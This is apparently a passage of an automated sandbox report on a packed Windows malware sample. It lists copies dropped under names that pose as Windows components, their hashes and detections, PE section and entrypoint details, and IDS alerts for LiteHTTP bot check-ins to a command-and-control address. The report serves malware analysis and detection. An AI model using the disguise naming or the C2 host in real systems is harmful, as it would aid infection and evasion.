                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows media player.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows multimedia platform.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows multimedia platform.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows nt.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows nt.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows photo viewer.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows photo viewer.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows portable devices.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows portable devices.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows sidebar.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows sidebar.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windowspowershell.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windowspowershell.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.9328592774034865
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:DQmU06kq9I.exe
                                        File size:1'763'328 bytes
                                        MD5:d37dab4c59e707f632bb0b91eaa87ff9
                                        SHA1:0e153debcf54805a0543646620511b57865d6fc9
                                        SHA256:375a067be10250dc045ea14025444ad7ec0662cf189abbbd393e6f7ffe85b35d
                                        SHA512:0ae81abbe56f0a20c8066c52672d969c962a20b19c7e7165b12c7b16a4f0681c4f96ce2cedde50ade5975ced262d581fc99d0947c188cec847c8a82eb85bc0ae
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        TLSH:4185338AB8F1456DCC9E86B0431FD0C76BDE792C508221BDCB6060A4693276F6CA5BE5
                                        File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`................................

                                        File Icon

                                        Icon Hash:889669d8d8299628

                                        Static PE Info

                                        General

                                        Entrypoint:0x85a000
                                        Entrypoint Section:.taggant
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE
                                        Time Stamp:0x675E7DB5 [Sun Dec 15 06:56:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                        Entrypoint Preview

                                        Instruction
                                        jmp 00007F729110560Ah
                                        shufps xmm3, dqword ptr [edx], 00h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        jmp 00007F7291107605h
                                        add byte ptr [edx+ecx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax], eax
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add eax, 0000000Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+0Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        or al, 80h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add al, 0Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax], eax
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        push es
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add al, 0Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add al, 00h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        and al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        pop es
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x100550x69.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000xcd8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x101f80x8.idata
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        0x20000xc0000x54006f7f93910a70242b7110e0a5798312cfFalse0.9950706845238095data7.964759279856404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xe0000xcd80xe000e166fb982c23b87e81342707752f30eFalse0.33175223214285715data3.8103289780727865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata 0x100000x20000x200c5fa453236d44d94fedf773411bc9006False0.150390625data0.9342685949460681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x120000x2a20000x2002f858a1ba3c1b1add9d83a0de4b4e4afunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        fsrfimey0x2b40000x1a40000x1a3c0061df25f4ba7966b0342595c001aa689fFalse0.9949264117406195data7.953315584919624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        mhpawist0x4580000x20000x4006fa68b4dc94bf991144fa8891d94fcf0False0.80078125data6.274634545404948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .taggant0x45a0000x40000x22003c08f71781e751512be92420a1a33dc5False0.0625DOS executable (COM)0.7178556540423161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xe1300x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.299390243902439
                                        RT_GROUP_ICON0xe7980x14data1.1
                                        RT_VERSION0xe7ac0x394OpenPGP Secret Key0.39192139737991266
                                        RT_MANIFEST0xeb400x198ASCII text, with CRLF line terminators0.5833333333333334

                                        Imports

                                        DLLImport
                                        kernel32.dlllstrcpy

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-12-17T10:20:18.128651+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549826185.208.159.10980TCP
                                        2024-12-17T10:20:19.143774+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549826185.208.159.10980TCP
                                        2024-12-17T10:20:19.143774+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549826185.208.159.10980TCP
                                        2024-12-17T10:20:35.925260+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549867185.208.159.10980TCP
                                        2024-12-17T10:20:36.924933+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549867185.208.159.10980TCP
                                        2024-12-17T10:20:36.924933+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549867185.208.159.10980TCP
                                        2024-12-17T10:20:55.472043+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549908185.208.159.10980TCP
                                        2024-12-17T10:20:56.558753+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549908185.208.159.10980TCP
                                        2024-12-17T10:20:56.558753+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549908185.208.159.10980TCP
                                        2024-12-17T10:21:12.644070+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549948185.208.159.10980TCP
                                        2024-12-17T10:21:13.643978+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549948185.208.159.10980TCP
                                        2024-12-17T10:21:13.643978+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549948185.208.159.10980TCP
                                        2024-12-17T10:21:28.706502+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549979185.208.159.10980TCP
                                        2024-12-17T10:21:29.722238+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549979185.208.159.10980TCP
                                        2024-12-17T10:21:29.722238+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549979185.208.159.10980TCP
                                        2024-12-17T10:21:31.550246+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549980185.208.159.10980TCP
                                        2024-12-17T10:21:32.560184+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549980185.208.159.10980TCP
                                        2024-12-17T10:21:32.560184+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549980185.208.159.10980TCP
                                        2024-12-17T10:21:37.207748+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549981185.208.159.10980TCP
                                        2024-12-17T10:21:38.143751+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549981185.208.159.10980TCP
                                        2024-12-17T10:21:38.143751+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549981185.208.159.10980TCP
                                        2024-12-17T10:21:43.738125+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549982185.208.159.10980TCP
                                        2024-12-17T10:21:44.722069+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549982185.208.159.10980TCP
                                        2024-12-17T10:21:44.722069+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549982185.208.159.10980TCP
                                        2024-12-17T10:21:54.362643+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549983185.208.159.10980TCP
                                        2024-12-17T10:21:55.440621+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549983185.208.159.10980TCP
                                        2024-12-17T10:21:55.440621+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549983185.208.159.10980TCP
                                        2024-12-17T10:21:56.034479+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549984185.208.159.10980TCP
                                        2024-12-17T10:21:57.144479+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549984185.208.159.10980TCP
                                        2024-12-17T10:21:57.144479+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549984185.208.159.10980TCP
                                        2024-12-17T10:22:11.660045+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549985185.208.159.10980TCP
                                        2024-12-17T10:22:12.722386+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549985185.208.159.10980TCP
                                        2024-12-17T10:22:12.722386+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549985185.208.159.10980TCP
                                        2024-12-17T10:22:14.222561+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549986185.208.159.10980TCP
                                        2024-12-17T10:22:15.331500+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549986185.208.159.10980TCP
                                        2024-12-17T10:22:15.331500+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549986185.208.159.10980TCP
                                        2024-12-17T10:22:29.597040+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549987185.208.159.10980TCP
                                        2024-12-17T10:22:30.456639+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549988185.208.159.10980TCP
                                        2024-12-17T10:22:30.612546+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549987185.208.159.10980TCP
                                        2024-12-17T10:22:30.612546+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549987185.208.159.10980TCP
                                        2024-12-17T10:22:31.612580+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549988185.208.159.10980TCP
                                        2024-12-17T10:22:31.612580+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549988185.208.159.10980TCP
                                        2024-12-17T10:22:36.347067+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549989185.208.159.10980TCP
